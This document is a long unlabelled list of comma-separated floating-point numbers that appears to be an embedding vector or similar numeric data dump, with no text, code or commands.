0.014026705175638199, 0.02109300158917904, 0.026641562581062317, -0.007821635343134403, -0.011040647514164448, -0.009191127493977547, -0.01622212864458561, -0.012431317009031773, 0.029535850510001183, 0.008492263033986092, 0.016504496335983276, 0.01534678228199482, -0.0011577149853110313, -0.0048073409125208855, -0.03797869756817818, -0.00732042919844389, 0.0017648093635216355, -0.02110712043941021, -0.01387140154838562, 0.036002110689878464, -0.02161538600921631, -0.020697684958577156, -0.022603677585721016, 0.030975934118032455, 0.0003152390709146857, 0.00024486728943884373, 0.04605446383357048, -0.027799276635050774, 0.030834749341011047, -0.019243480637669563, 0.045997992157936096, 0.009127593599259853, -0.019836457446217537, 0.018763452768325806, 0.03648214042186737, -0.03893875330686569, 0.01725277677178383, -0.00934643018990755, 0.022024821490049362, 0.038825806230306625, -0.026119178161025047, -0.002825459698215127, -0.022900165989995003, -0.023831985890865326, -0.04537677764892578, 0.01475380640476942, 0.008880521170794964, -0.03021353669464588, -0.0216436218470335, 0.039531730115413666, 0.03631271794438362, -0.007263955194503069, 0.022236598655581474, -0.022293072193861008, 0.013751395046710968, 0.017732804641127586, 0.0387410968542099, 0.003942584153264761, -0.0275451447814703, -0.001582151628099382, 0.008174597285687923, 0.009275837801396847, 0.03142772614955902, 0.05952348932623863, 0.005386198405176401, 0.009798221290111542, 0.02878757007420063, 0.011901874095201492, 0.018749333918094635, -0.018071647733449936, 0.0491887666285038, 0.062686026096344, -0.027488671243190765, 0.0011727157980203629, -0.017930462956428528, -0.023944932967424393, -0.010419434867799282, 0.009127593599259853, 0.011167713440954685, 0.005707393400371075, -0.01605270616710186, -0.009889991953969002, 0.010772396810352802, 0.017210420221090317, 0.005068532656878233, 0.0003112682607024908, -0.002479557180777192, -0.011188891716301441, -0.0027478081174194813, -0.03574797883629799, 0.010377079248428345, 0.026585089042782784, -0.008111064322292805, 0.022801337763667107, -0.030778275802731514, 0.014697332866489887, -0.01602446846663952, -0.009784103371202946, -0.02445319853723049, 0.0042567201890051365, -0.0226601529866457, 0.03560679405927658, -0.005545030813664198, -0.0288016889244318, -0.00732042919844389, 0.006180362310260534, 0.039362307637929916, 0.022038940340280533, 0.025173241272568703, -0.009000527672469616, 0.030382957309484482, -0.010250012390315533, -0.004916758742183447, -0.004729689098894596, -0.0048496960662305355, 0.021911872550845146, 0.004422612488269806, 0.0017683389596641064, 0.019314073026180267, 0.009431141428649426, -0.005735630635172129, 0.0023136651143431664, -0.0053120763041079044, 0.007793398108333349, -0.009254660457372665, -0.014612621627748013, -0.00943820085376501, -0.006039177533239126, -0.018918756395578384, -0.024890871718525887, 0.0104829678311944, 0.019779983907938004, -0.02546972967684269, 0.002022471511736512, -0.012939582578837872, -0.007271014619618654, -0.03176656737923622, -0.04489675164222717, 0.0013518439373001456, -0.003907287959009409, 0.014069059863686562, 0.04359785094857216, -0.002606623340398073, 0.013073707930743694, -0.0162503644824028, -0.02685333974659443, 0.0400964692234993, -0.00536149088293314, -0.0426095575094223, 0.02476380579173565, 0.022900165989995003, -0.009289956651628017, 0.012163066305220127, 0.028858162462711334, 0.02474968694150448, 0.031145356595516205, -0.008478144183754921, 0.006565090734511614, -0.001565385959111154, 0.017690449953079224, 0.029197005555033684, -0.006526264827698469, 0.004768515005707741, 0.016448022797703743, 0.033037230372428894, 0.00462380051612854, 0.015177360735833645, -0.019850576296448708, -0.020542381331324577, -0.011894815601408482, -0.0020842398516833782, -0.010948877781629562, 0.012819575145840645, -0.017337488010525703, 0.02532854489982128, 0.03125830367207527, 0.0032419548369944096, -0.005294428206980228, 0.0325007289648056, -0.017549265176057816, 0.003042531432583928, -0.023083707317709923, 0.022575441747903824, 0.0012583091156557202, 0.009748807176947594, -0.016532734036445618, 0.018015174195170403, 0.007158066611737013, 0.005167361814528704, -0.021177712827920914, 0.0025166182313114405, 0.014937346801161766, 0.025159122422337532, 0.02093769796192646, -0.045997992157936096, -0.008195774629712105, -0.02458026446402073, 0.003635507309809327, -0.02181304432451725, -0.020344723016023636, 0.0007037177565507591, 0.002518383087590337, 0.020909462124109268, 0.018354017287492752, -0.011203009635210037, -0.023973170667886734, 0.019412903115153313, 0.009487614966928959, -0.002781339455395937, -0.0390799380838871, 0.017168065533041954, 0.02040119655430317, -0.019667034968733788, -0.037244535982608795, 0.027629856020212173, 0.004959114361554384, -0.025935638695955276, -0.01151361595839262, 0.004736748524010181, -0.005897992756217718, -0.0010218246607109904, 0.01829754374921322, -0.02445319853723049, 0.00830166321247816, 0.0037519847974181175, -0.014266719110310078, -0.005223835818469524, 0.021714214235544205, 0.027686329558491707, -0.004676744807511568, -0.012325428426265717, -0.020316485315561295, -0.0017542204586789012, 0.014782043173909187, -0.01475380640476942, 0.02143184468150139, -0.008414611220359802, -0.003194304881617427, -0.016504496335983276, 0.0064203767105937, 0.014626740477979183, -0.003653155406937003, 0.020528262481093407, -0.011386550031602383, 0.008400492370128632, 0.009960584342479706, -0.004768515005707741, -0.029366428032517433, -0.03651037439703941, 0.030580617487430573, -0.006734512746334076, -0.019229363650083542, -0.004680274520069361, 0.025766216218471527, -0.006014470476657152, -0.011492438614368439, 0.03413847088813782, 0.005057943519204855, -0.001648331992328167, -0.026232127100229263, -0.01572798192501068, 0.0012283073738217354, -0.028335779905319214, 0.002211306244134903, 0.05387610197067261, 0.014139652252197266, 0.009988821111619473, 0.01572798192501068, 0.000402155943447724, 0.018382254987955093, -0.0023348426911979914, -0.0015442081494256854, 0.022744862362742424, -0.0035366779193282127, 0.012127770110964775, 0.003148420015349984, -0.01266427244991064, -0.01544561143964529, 0.03176656737923622, 0.02129065990447998, -0.0128407534211874, -0.015996232628822327, 0.013864342123270035, -0.025512084364891052, -0.004521441645920277, -0.0228295736014843, 0.022533085197210312, 0.006547442637383938, -0.011668919585645199, -0.007391021586954594, -0.008873461745679379, -0.02212364971637726, 0.0192011259496212, 0.006999233737587929, -0.009311133995652199, 0.0012688979040831327, -0.010454731062054634, -0.00396376196295023, 0.010362960398197174, -0.026655681431293488, -0.004697922617197037, -0.024636738002300262, -0.020443551242351532, -0.009332312270998955, 0.01133007649332285, -0.014167889952659607, -0.03399728611111641, -0.007560443133115768, 0.005527382716536522, 0.024904990568757057, 0.00043723153066821396, 0.01248779147863388, -0.015516203828155994, -0.02007647231221199, -0.01725277677178383, -0.026415666565299034, 0.007059237454086542, -0.009946465492248535, -0.0009556442964822054, -0.014697332866489887, 0.03924936056137085, 0.0086334478110075, -0.0018265777034685016, 0.0169280506670475, 0.03854343667626381, 0.034110236912965775, 0.02530030719935894, -0.05300075560808182, -0.024552028626203537, -0.0015053823590278625, -0.004532030317932367, -0.025709742680191994, 0.0016536263283342123, 0.016306838020682335, 0.0221518874168396, 0.014054941944777966, 0.02161538600921631, 0.011661860160529613, 0.015177360735833645, -0.013723157346248627, -0.00897229090332985, 0.008245189674198627, -0.022984877228736877, 0.020980054512619972, -0.011584208346903324, -0.022886047139763832, 0.00899346824735403, 0.005022647324949503, 0.016123298555612564, 0.004532030317932367, 0.01673039235174656, -0.012551324442029, -0.01886228285729885, -0.040039993822574615, -0.0288016889244318, -0.007426317781209946, 0.013490202836692333, -0.02580857276916504, 0.019144652411341667, 0.01142890565097332, 0.020005879923701286, -0.008485203608870506, -0.019243480637669563, 0.0060109407640993595, -0.020641209557652473, -0.033771391957998276, -0.007899287156760693, -0.02393081597983837, -0.012593680061399937, -0.016970407217741013, -0.03320665284991264, -0.017492789775133133, 0.004175539128482342, 0.02387434057891369, 0.00440496439114213, -0.0011356548639014363, 0.017224539071321487, -0.0020418844651430845, -0.02143184468150139, 0.03919288516044617, -0.018452847376465797, -0.010595915839076042, -0.013956112787127495, -0.015078531578183174, -0.026585089042782784, 0.010673566721379757, -0.011570090427994728, 0.03475968539714813, -0.0040625911206007, -0.009819399565458298, 0.023973170667886734, -0.021756570786237717, -0.006272132508456707, 0.024735568091273308, -0.020443551242351532, 0.004630859941244125, 0.015177360735833645, 0.020443551242351532, -0.004016706254333258, -0.0054356129840016365, 0.000021205287339398637, 0.03611505776643753, -0.0105676781386137, 0.011245365254580975, 0.01728101260960102, 0.016673918813467026, 0.01848108321428299, -0.0053897276520729065, 0.015615032985806465, -0.011132417246699333, -0.010680626146495342, -0.03295252099633217, -0.0014100826811045408, -0.002980763092637062, -0.011739511974155903, -0.0032684269826859236, 0.028844043612480164, 0.017393961548805237, -0.017577501013875008, 0.005209717433899641, -0.014979701489210129, 0.015431493520736694, 0.0014144947053864598, -0.030947696417570114, -0.026246244087815285, 0.02201070263981819, 0.036708034574985504, -0.008915817365050316, 0.0015459730057045817, -0.02026001177728176, -0.0017603973392397165, 0.02074003964662552, 0.014612621627748013, 0.03128654137253761, -0.023662563413381577, 0.0005832695169374347, 0.0005237071891315281, -0.009162889793515205, 0.0015353841008618474, 0.03272662311792374, -0.02565326914191246, -0.01917288824915886, 0.018805809319019318, -0.005266190972179174, 0.012339547276496887, 0.006353313568979502, -0.002980763092637062, 0.014697332866489887, -0.034420840442180634, -0.014316133223474026, 0.017549265176057816, -0.02021765522658825, -0.03574797883629799, 0.015318545512855053, 0.02777104079723358, -0.013250188902020454, -0.005167361814528704, 0.01921524479985237, 0.0032719564624130726, -0.010659448802471161, -0.003061944153159857, 0.005912111606448889, 0.008252248167991638, -0.04066120833158493, 0.04289192706346512, -0.006095651537179947, 0.027672210708260536, -0.030382957309484482, 0.013151359744369984, 0.021558910608291626, -0.01673039235174656, -0.017153946682810783, 0.004330842290073633, 0.025032056495547295, -0.01237484347075224, -0.014909109100699425, 0.016871577128767967, -0.012014822103083134, -0.02076827734708786, -0.03298075869679451, -0.02092357911169529, 0.008774632588028908, 0.006801575422286987, -0.005142654292285442, 0.003688451601192355, 0.008428729139268398, 0.014767925255000591, -0.01973762735724449, 0.02562503144145012, 0.013927875086665154, -0.010525323450565338, 0.011612446047365665, -0.003167832735925913, -0.014824398793280125, -0.005566208623349667, -0.007313370238989592, -0.018904637545347214, 0.045263830572366714, -0.02352137863636017, 0.008238130249083042, 0.0034096117597073317, -0.019469376653432846, 0.014598502777516842, -0.015163241885602474, -0.01641978695988655, -0.007080415263772011, 0.030637091025710106, -0.015629151836037636, -0.004253190476447344, -0.009064060635864735, 0.04060473293066025, 0.07132653892040253, -0.010405316017568111, -0.028025172650814056, -0.010137065313756466, -0.01833989843726158, -0.02706511691212654, 0.011725393123924732, -0.00667097931727767, 0.014436140656471252, -0.008979350328445435, 0.011803044937551022, -0.00036068292683921754, -0.007426317781209946, 0.028886400163173676, -0.007976938039064407, -0.004235542379319668, -0.006685097701847553, 0.013101944699883461, 0.02580857276916504, -0.009642918594181538, 0.019130533561110497, 0.004750866908580065, 0.01377257239073515, -0.00527325039729476, 0.02688157558441162, -0.023083707317709923, -0.012770161032676697, -0.035126764327287674, -0.017309250310063362, -0.01586916670203209, 0.00619801040738821, -0.0010121181840077043, -0.014309074729681015, -0.016320956870913506, 0.013243129476904869, 0.010504145175218582, 0.009960584342479706, 0.002742513781413436, -0.0022430727258324623, -0.025907400995492935, -0.020824750885367393, -0.01992116868495941, -0.010080590844154358, -0.004556737840175629, 0.009480555541813374, 0.02095181681215763, 0.045122645795345306, 0.00618742173537612, -0.0010994762415066361, 0.013405491597950459, 0.015784455463290215, -0.028053410351276398, 0.031314779072999954, -0.00405200244858861, 0.0038296363782137632, -0.0019889401737600565, -0.012614857405424118, 0.004764985293149948, -0.01938466541469097, 0.015600915066897869, 0.005665038246661425, 0.014111415483057499, -0.003494322532787919, -0.009515851736068726, -0.012593680061399937, -0.009035823866724968, -0.007249836809933186, -0.003264897270128131, -0.016490379348397255, 0.008951113559305668, 0.015939759090542793, -0.013137240894138813, -0.0025783865712583065, 0.007440436165779829, 0.008626388385891914, 0.013977290131151676, 0.0049485256895422935, 0.016645681113004684, -0.014866754412651062, -0.018763452768325806, 0.014683214016258717, 0.0060462369583547115, 0.003076062770560384, 0.028731096535921097, -0.015770336613059044, 0.025215595960617065, -0.005982703994959593, -0.011301838792860508, 0.013680802658200264, 0.013941993936896324, -0.0038155177608132362, 0.030439432710409164, 0.006653331220149994, 0.013779631815850735, 0.018946994096040726, 0.026274481788277626, 0.004973232746124268, -0.01300311554223299, -0.03032648377120495, -0.020641209557652473, -0.02110712043941021, -0.006399198900908232, -0.0022448375821113586, 0.0012256600894033909, 0.009706451557576656, 0.023295484483242035, -0.005597975105047226, 0.018594032153487206, 0.008753454312682152, -0.015403255820274353, -0.031851280480623245, -0.036538612097501755, -0.00890875793993473, -0.01056061964482069, -0.021671859547495842, 0.024382606148719788, 0.01903170347213745, 0.004994410555809736, -0.011824223212897778, -0.017761042341589928, -0.01694216951727867, 0.0070557077415287495, 0.015939759090542793, 0.010525323450565338, 0.006554502062499523, 0.008619328960776329, -0.0105676781386137, -0.019850576296448708, 0.022773100063204765, 0.01657508872449398, 0.02130477875471115, 0.009685274213552475, 0.013836105354130268, 0.014598502777516842, 0.011852459982037544, -0.024312013760209084, 0.015967994928359985, 0.04187539592385292, -0.014626740477979183, 0.015982113778591156, -0.011485379189252853, 0.038797568529844284, 0.007539265789091587, 0.0006997468881309032, -0.0048073409125208855, 0.006932171061635017, 0.004429671447724104, 0.019681153818964958, -0.016292721033096313, 0.04311782121658325, 0.025441491976380348, -0.012353665195405483, 0.008294603787362576, 0.020852986723184586, 0.01620800979435444, -0.01030648685991764, 0.01764809340238571, -0.0022748392075300217, 0.019977642223238945, 0.04218600317835808, 0.024989699944853783, 0.006653331220149994, 0.025385018438100815, -0.011668919585645199, -0.008626388385891914, 0.04150831699371338, 0.0016853929264470935, -0.05252072587609291, -0.027785159647464752, -0.02003411576151848, 0.022067176178097725, 0.0026136827655136585, 0.00737690320238471, 0.01691393367946148, 0.013687861151993275, -0.0014762630453333259, -0.002303076209500432, 0.0025377958081662655, 0.02631683647632599, 0.0043449606746435165, -0.0048602852039039135, 0.01760573871433735, 0.010009998455643654, 0.018946994096040726, 0.014337311498820782, -0.007122770417481661, 0.004030824638903141, 0.003953172825276852, -0.040378838777542114, 0.01274898275732994, 0.004853225778788328, 0.040039993822574615, -0.004027294926345348, -0.018212832510471344, -0.006600386928766966, 0.009508793242275715, 0.00689334562048316, -0.016815103590488434, -0.008626388385891914, 0.03379962965846062, 0.010511204600334167, -0.004627330228686333, 0.003183716209605336, 0.0018830515909940004, 0.004973232746124268, -0.012184243649244308, -0.008506380952894688, 0.016123298555612564, -0.005128535907715559, -0.022730745375156403, -0.003688451601192355, 0.021558910608291626, -0.015953876078128815, -0.02513088472187519, 0.004468497354537249, -0.007680450566112995, -0.019667034968733788, -0.02109300158917904, 0.009452318772673607, -0.00043568731052801013, -0.015304426662623882, 0.03509853035211563, 0.005220306105911732, 0.013913757167756557, -0.018932875245809555, 0.024114355444908142, 0.03470320999622345, -0.02390257827937603, 0.015530322678387165, -0.009882932528853416, -0.009798221290111542, 0.012106591835618019, 0.004366138484328985, 0.005160302389413118, -0.0077369241043925285, -0.04198834300041199, 0.004288486670702696, 0.0038649325724691153, -0.0017780454363673925, 0.00940996315330267, 0.003727277275174856, 0.002417788840830326, -0.030298247933387756, -0.008824046701192856, -0.0017559853149577975, -0.00021894666133448482, -0.006741571705788374, -0.014414963312447071, -0.016984526067972183, 0.025935638695955276, -0.011287720873951912, -0.001323607051745057, 0.009127593599259853, -0.01903170347213745, -0.0017039234517142177, -0.0011109474580734968, 0.02198246493935585, 0.014937346801161766, -0.011937170289456844, 0.010475908406078815, 0.003379609901458025, -0.011753630824387074, 0.008449907414615154, 0.02582269161939621, -0.0026736862491816282, 0.02218012325465679, 0.00005735630475101061, -0.0047614555805921555, 0.002645449247211218, 0.026387428864836693, 0.011563031002879143, 0.012268954887986183, 0.007503969594836235, -0.0004667920875363052, -0.014669095166027546, 0.001349196769297123, -0.007016881834715605, -0.009713510982692242, 0.013963171280920506, 0.008407551795244217, -0.020485907793045044, 0.0572645328938961, 0.0013968466082587838, -0.04269426688551903, 0.011139476671814919, -0.03204893693327904, -0.014097297564148903, 0.007920464500784874, 0.0007743100868538022, -0.018424609676003456, -0.007828694768249989, -0.0070839449763298035, -0.02775692194700241, -0.014457318000495434, 0.018622267991304398, 0.004874403588473797, -0.012261895462870598, 0.010327664203941822, -0.006953348871320486, -0.010440612211823463, 0.0064627318643033504, -0.0018318721558898687, 0.02178480662405491, 0.010984173975884914, -0.031173592433333397, 0.00007737585838185623, -0.009868813678622246, -0.0033107823692262173, 0.004489675164222717, -0.010193538852036, 0.004112005699425936, -0.022391900420188904, 0.0008171067456714809, 0.0048602852039039135, -0.01952585019171238, -0.006808634381741285, 0.0035666797775775194, -0.000004560239631246077, -0.014436140656471252, 0.013221952132880688, 0.0030037055257707834, -0.022646034136414528, -0.010299427434802055, -0.006116829346865416, 0.010165302082896233, 0.022914284840226173, -0.0012724275002256036, -0.004249660763889551, -0.00021034321980550885, -0.011626563966274261, 0.011471261270344257, 0.002594269812107086, 0.013024292886257172, 0.0005131183424964547, 0.014570266008377075, 0.001182422274723649, 0.017563382163643837, -0.02305546961724758, -0.030241772532463074, 0.00440496439114213, -0.04515088349580765, -0.001967762364074588, -0.008689921349287033, 0.0008316664025187492, 0.018354017287492752, 0.005057943519204855, 0.03278309851884842, 0.0028289894107729197, 0.016631564125418663, -0.04323077201843262, -0.021756570786237717, 0.0034449079539626837, 0.015953876078128815, 0.025003818795084953, -0.0018001055577769876, -0.018424609676003456, -0.007976938039064407, -0.014598502777516842, 0.01589740253984928, -0.021671859547495842, -0.0071263001300394535, -0.010708862915635109, 0.0049485256895422935, 0.0037696328945457935, 0.014174948446452618, -0.012890167534351349, -0.0048955813981592655, 0.002126595238223672, 0.00263662519864738, -0.018706979230046272, 0.007722805719822645, 0.010525323450565338, 0.03072180226445198, 0.0047543966211378574, -0.022067176178097725, -0.010066472925245762, 0.03749866783618927, -0.041593026369810104, -0.0016421551117673516, 0.006907464005053043, -0.005862696561962366, 0.00029163475846871734, -0.010744159109890461, 0.000265824404777959, -0.02458026446402073, 0.0022907224483788013, -0.011725393123924732, 0.007383962627500296, -0.020302366465330124, -0.004108475986868143, -0.0034360839053988457, -0.018029293045401573, 0.010539441369473934, 0.012205421924591064, 0.017690449953079224, -0.015530322678387165, -0.017845751717686653, 0.010278250090777874, -0.029592324048280716, -0.009861755184829235, 0.008492263033986092, -0.0066392128355801105, 0.001569797983393073, 0.013313721865415573, -0.0049661737866699696, 0.012388961389660835, 0.013843164779245853, -0.024213183671236038, 0.018043411895632744, -0.0035066762939095497, 0.021587148308753967, -0.004757925868034363, 0.042327187955379486, -0.02877345122396946, -0.01795870065689087, -0.007616917137056589, -0.015643270686268806, 0.0059579964727163315, 0.019864695146679878, 0.0028554615564644337, 0.02322489209473133, 0.0009574090945534408, -0.013377254828810692, -0.012085414491593838, -0.0038825806695967913, -0.02076827734708786, 0.03176656737923622, 0.010962995700538158, -0.032331306487321854, -0.02757338248193264, -0.005103828851133585, 0.0034043171908706427, 0.01272780541330576, -0.010786514729261398, 0.008160478435456753, 0.022758981212973595, 0.0015442081494256854, -0.0012062472524121404, 0.0015539146261289716, -0.0020454139448702335, 0.010038236156105995, 0.0027566321659833193, -0.012424257583916187, 0.006025059148669243, -0.006681568454951048, -0.019638799130916595, -0.005266190972179174, -0.011626563966274261, -0.02285781130194664, -0.011951289139688015, -0.0039002287667244673, 0.01099829189479351, 0.001340372720733285, 0.0005162067245692015, -0.015149123966693878, -0.01397023070603609, 0.016095060855150223, 0.009367608465254307, -0.004157891031354666, -0.00711218174546957, -0.004980292171239853, -0.018777571618556976, 0.019977642223238945, 0.0034784392919391394, 0.013052529655396938, 0.015756217762827873, 0.0009706451673991978, -0.00038958166260272264, 0.007052178028970957, 0.010440612211823463, 0.028844043612480164, -0.020895343273878098, -0.022533085197210312, -0.00025523555814288557, 0.016278602182865143, -0.020161181688308716, -0.010532381944358349, 0.005132065620273352, -0.010610033757984638, -0.015586796216666698, 0.0014577325200662017, 0.022603677585721016, -0.023267246782779694, 0.021403608843684196, 0.008266367018222809, 0.03998352214694023, -0.009431141428649426, 0.0007469555712305009, -0.01247367262840271, 0.014979701489210129, 0.0011621270095929503, 0.012064237147569656, -0.00792752392590046, 0.003988469019532204, 0.025893284007906914, -0.02130477875471115, -0.013391373679041862, 0.031851280480623245, 0.004306134767830372, 0.012643094174563885, 0.004355549346655607, 0.0025377958081662655, 0.013327840715646744, 0.0020595325622707605, -0.006074473727494478, 0.004486145451664925, -0.031681858003139496, -0.010024117305874825, 0.0071898335590958595, -0.01884816400706768, -0.0013871401315554976, 0.0167586300522089, -0.01011588703840971, 0.017040999606251717, 0.010715922340750694, 0.0070839449763298035, -0.007348666433244944, 0.0035543260164558887, -0.0003436966217122972, 0.0035702092573046684, 0.013172537088394165, 0.012819575145840645, 0.0001725101174088195, -0.021700095385313034, 0.004429671447724104, 0.008492263033986092, 0.0012503674952313304, 0.018579913303256035, -0.009826458990573883, -0.012805457226932049, 0.008802869357168674, -0.0006543030613102019, -0.0020507085137069225, 0.013744335621595383, -0.01054650079458952, -0.0010606504511088133, 0.027827514335513115, -0.0167586300522089, 0.010793574154376984, -0.011795985512435436, -0.0024813220370560884, -0.007991056889295578, 0.0025783865712583065, 0.016179772093892097, -0.018537556752562523, 0.0055062053725123405, -0.005622682627290487, -0.020316485315561295, -0.013920816592872143, -0.0008894639322534204, -0.0013897874159738421, 0.0005497381207533181, -0.013377254828810692, -0.006766279228031635, 0.0016898049507290125, -0.01606682501733303, -0.01266427244991064, -0.00025589735014364123, -0.014824398793280125, -0.0011753630824387074, -0.014054941944777966, 0.004655566997826099, 0.005160302389413118, 0.004941466264426708, 0.004817929584532976, 0.024142591282725334, -0.002211306244134903, 0.023817867040634155, -0.00035009405110031366, -0.021558910608291626, 0.026458021253347397, -0.005555619951337576, -0.00571445282548666, -0.0030054703820496798, -0.015586796216666698, 0.005760337691754103, 0.005142654292285442, -0.008831106126308441, 0.022194242104887962, -0.0015856812242418528, 0.02247661165893078, 0.011541853658854961, 0.001626271870918572, -0.0054073757492005825, 0.004599092993885279, -0.030834749341011047, 0.028011053800582886, -0.03501381725072861, 0.0016403902554884553, -0.017563382163643837, 0.02321077324450016, 0.004472027067095041, 0.019652917981147766, 0.02021765522658825, -0.004090827889740467, -0.015615032985806465, -0.013038411736488342, 0.0066392128355801105, -0.0043449606746435165, 0.014584384858608246, -0.005827400367707014, 0.01404788251966238, 0.005326194688677788, 0.004288486670702696, -0.019102295860648155, -0.007906345650553703, 0.022278953343629837, -0.00836519617587328, 0.002580151194706559, -0.0245943833142519, -0.005125006195157766, -0.008527559228241444, -0.004461437929421663, 0.002594269812107086, -0.008421670645475388, -0.014358488842844963, 0.00828754436224699, -0.001015647780150175, -0.0039178766310215, -0.027785159647464752, 0.015643270686268806, -0.025017937645316124, -0.010970055125653744, 0.015064412727952003, -0.012000703252851963, 0.017535146325826645, 0.012198362499475479, -0.02182716317474842, 0.012184243649244308, -0.013574914075434208, 0.0017771630082279444, -0.013285485096275806, -0.0038931695744395256, 0.018961111083626747, -0.004719100426882505, 0.02777104079723358, -0.006999233737587929, -0.01465497724711895, 0.022589560598134995, -0.0031448903027921915, -0.005481497850269079, -0.007412199396640062, -0.009057002142071724, -0.014909109100699425, 0.007433377206325531, 0.0040625911206007, 0.013779631815850735, 0.009311133995652199, -0.010200598277151585, 0.0071968925185501575, 0.025229714810848236, -0.0024283777456730604, 0.00027707507251761854, 0.011986585333943367, 0.019427021965384483, -0.01586916670203209, 0.02213776856660843, -0.0008718158351257443, 0.0011241835309192538, -0.00021751275926362723, 0.012071295641362667, 0.0008779926574788988, 0.007482791785150766, 0.0030037055257707834, 0.01341961044818163, -0.0006476850248873234, -0.0007354842964559793, 0.013158418238162994, -0.002497205277904868, 0.015177360735833645, 0.005912111606448889, -0.005936818663030863, -0.006798045709729195, 0.0070910039357841015, -0.023281365633010864, -0.016278602182865143, -0.002506029326468706, -0.002557208761572838, -0.012643094174563885, 0.00028678152011707425, -0.0015812691999599338, 0.012325428426265717, -0.009875873103737831, 0.0010474143782630563, -0.01898934878408909, -0.014584384858608246, -0.007405139971524477, 0.0149938203394413, -0.010490027256309986, 0.002574856858700514, 0.011774808168411255, 0.004987351130694151, 0.04210129380226135, -0.007899287156760693, 0.010257071815431118, -0.043174296617507935, -0.005047354847192764, 0.016095060855150223, -0.0010253542568534613, 0.015558559447526932, -0.004348490387201309, -0.0053297244012355804, 0.004715570714324713, 0.00606741476804018, -0.001976586412638426, -0.015840929001569748, 0.005950937047600746, 0.0030231184791773558, -0.0029701741877943277, 0.00272486568428576, 0.015431493520736694, 0.000914171279873699, 0.010984173975884914, -0.01248779147863388, -0.00854167714715004, -0.004733218811452389, -0.0025519144255667925, -0.0035225595347583294, 0.027347486466169357, -0.007962820120155811, -0.0007712217047810555, 0.010490027256309986, -0.002993116620928049, -0.005873285699635744, -0.012268954887986183, 0.009522911161184311, -0.0128407534211874, 0.006967467255890369, -0.015304426662623882, -0.009120535105466843, 0.0026772157289087772, 0.0007023941143415868, 0.012410139665007591, 0.008224011398851871, -0.000024073102395050228, -0.011478319764137268, 0.004366138484328985, -0.03247249126434326, -0.007567502558231354, 0.006240366026759148, 0.017859870567917824, 0.0035543260164558887, 0.0012512498069554567, 0.004387316294014454, -0.01620800979435444, -0.0038684620521962643, -0.006236836314201355, 0.01781751587986946, -0.01917288824915886, 0.010080590844154358, -0.004606152419000864, 0.008746394887566566, -0.0019254069775342941, -0.00500852894037962, 0.009551147930324078, -0.005117947235703468, -0.015812691301107407, -0.0077298651449382305, 0.003995528444647789, -0.011972466483712196, -0.006529794540256262, 0.012523087672889233, 0.004934406839311123, 0.020302366465330124, 0.008252248167991638, -0.002140713855624199, 0.009297016076743603, -0.013476083986461163, -0.020330604165792465, 0.005121476948261261, -0.010412375442683697, 0.009515851736068726, 0.02928171679377556, -0.008802869357168674, -0.0003463438479229808, -0.023281365633010864, 0.016010351479053497, -0.015502085909247398, -0.013991408981382847, -0.0019077588804066181, 0.013687861151993275, 0.0006670979200862348, -0.01671627350151539, 0.0055062053725123405, 0.019427021965384483, -0.013306662440299988, -0.017055118456482887, 0.010701804421842098, 0.023281365633010864, -0.017902227118611336, 0.0008457849035039544, 0.010581796988844872, -0.012953700497746468, 0.010341783054172993, -0.011499498039484024, 0.0017939286772161722, -0.010137065313756466, 0.0223213080316782, 0.0024566147476434708, -0.028138119727373123, -0.010285308584570885, -0.02826518751680851, 0.004281427711248398, -0.011358313262462616, 0.008132241666316986, 0.001828342559747398, 0.009487614966928959, -0.006526264827698469, 0.008386374451220036, -0.008471084758639336, -0.011930111795663834, -0.00040722975973039865, -0.02042943239212036, 0.004457908682525158, -0.012346606701612473, 0.015643270686268806, -0.02319665439426899, 0.006752160843461752, 0.03416670858860016, 0.003538442775607109, 0.011435965076088905, -0.009254660457372665, -0.010659448802471161, -0.004126124083995819, 0.00845696683973074, -0.01510676834732294, -0.0009865284664556384, -0.01640566810965538, 0.018608149141073227, -0.011633623391389847, -0.007383962627500296, 0.020118827000260353, 0.0017268660012632608, -0.01706923544406891, 0.014852635562419891, -0.025385018438100815, -0.02285781130194664, 0.009642918594181538, -0.0053297244012355804, 0.02335195802152157, -0.020330604165792465, 0.004916758742183447, 0.03204893693327904, -0.005859167315065861, -0.0067168646492064, 0.0009441730217076838, 0.005061473231762648, -0.005703863687813282, 0.0014321428025141358, -0.010977114550769329, -0.013461966067552567, 0.006508616730570793, 0.014393785037100315, -0.0047543966211378574, -0.0038119882810860872, -0.017379842698574066, 0.001837166608311236, -0.015135005116462708, -0.02023177407681942, -0.007715746760368347, 0.0033478434197604656, 0.013603150844573975, -0.00207541580311954, -0.020443551242351532, 0.011612446047365665, -0.008096945472061634, -0.018890518695116043, 0.009127593599259853, -0.023846104741096497, -0.007327488623559475, -0.015615032985806465, -0.012671330943703651, 0.012099533341825008, 0.006558031775057316, -0.004394375253468752, -0.0060815331526100636, -0.01361726876348257, -0.0009168184478767216, -0.036708034574985504, 0.003051355481147766, 0.012466613203287125, 0.0005179715226404369, -0.01884816400706768, 0.0033160767052322626, -0.0048320479691028595, -0.013038411736488342, 0.0038649325724691153, 0.022589560598134995, 0.016518615186214447, -0.011499498039484024, -0.01637743040919304, 0.003282545367255807, -0.0017074530478566885, 0.02914053201675415, 0.020005879923701286, -0.004133183509111404, 0.010151183232665062, -0.0015795043436810374, -0.014669095166027546, 0.0054885572753846645, 0.005485027562826872, 0.002544855000451207, 0.011090061627328396, 0.029366428032517433, 0.008838165551424026, 0.027178063988685608, -0.00618742173537612, -0.00899346824735403, -0.004634389188140631, 0.018368136137723923, 0.005746219307184219, 0.010835929773747921, -0.004592034034430981, 0.00008057458035182208, 0.016857458278536797, -0.008047530427575111, -0.007292192429304123, -0.008414611220359802, -0.031145356595516205, -0.0023877869825810194, 0.013250188902020454, -0.028914636000990868, 0.00029339955653995275, -0.0036037408281117678, 0.004634389188140631, -0.003331960178911686, 0.0017921639373525977, 0.004764985293149948, -0.009014646522700787, -0.0077016279101371765, 0.008421670645475388, 0.004457908682525158, 0.016659799963235855, 0.020118827000260353, -0.011111239902675152, 0.01654685288667679, -0.018452847376465797, -0.006088592112064362, -0.01509264949709177, 0.009289956651628017, 0.027700448408722878, -0.006801575422286987, -0.031088881194591522, -0.0011268308153375983, -0.01691393367946148, -0.02548384666442871, -0.0006657743360847235, 0.02456614561378956, 0.01464085839688778, -0.012226599268615246, -0.007878108881413937, 0.0016942169750109315, -0.019483495503664017, 0.002064826898276806, -0.010927699506282806, -0.008181655779480934, -0.027516907081007957, 0.009932347573339939, 0.019412903115153313, -0.019991761073470116, 0.009642918594181538, -0.0071192411705851555, 0.0013836105354130268, -0.00864050630480051, 0.00897229090332985, -0.0076592727564275265, 